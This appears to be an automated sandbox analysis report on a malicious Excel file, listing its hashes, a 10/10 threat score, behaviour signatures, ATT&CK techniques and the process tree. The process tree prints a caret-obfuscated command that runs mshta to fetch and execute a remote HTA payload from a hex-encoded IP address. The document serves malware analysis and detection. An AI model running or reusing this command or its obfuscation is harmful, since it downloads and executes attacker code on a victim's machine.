Analysis

  • max time kernel
    128s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-01-2022 01:47

General

  • Target

    file-109.xls

  • Size

    64KB

  • MD5

    2cb6e9a634e9c4ec6f778ea99ca7d0d0

  • SHA1

    86fa8fc1a65ddd9101bfdc1fa9856047fe8cdf4a

  • SHA256

    bb6945ad81d2dbbd4887be5f66373feebdab044c1d2ec5f014fb18398595946c

  • SHA512

    50aa4c85fd481d38c791154b746b85da15fc7d1a0ed24c8f4838bb4e1f64d63bd84b0d9606b3838c6d2218b6bd1e1f8f585cd23b4cb15f16ca1e06054fe6b3c6

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xc12a24f5/cc.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\file-109.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/cc.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1604
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xc12a24f5/cc.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:112

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1656-55-0x000000002FA41000-0x000000002FA44000-memory.dmp
    Filesize

    12KB

  • memory/1656-56-0x0000000071381000-0x0000000071383000-memory.dmp
    Filesize

    8KB

  • memory/1656-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1656-58-0x0000000074EC1000-0x0000000074EC3000-memory.dmp
    Filesize

    8KB

  • memory/1656-59-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB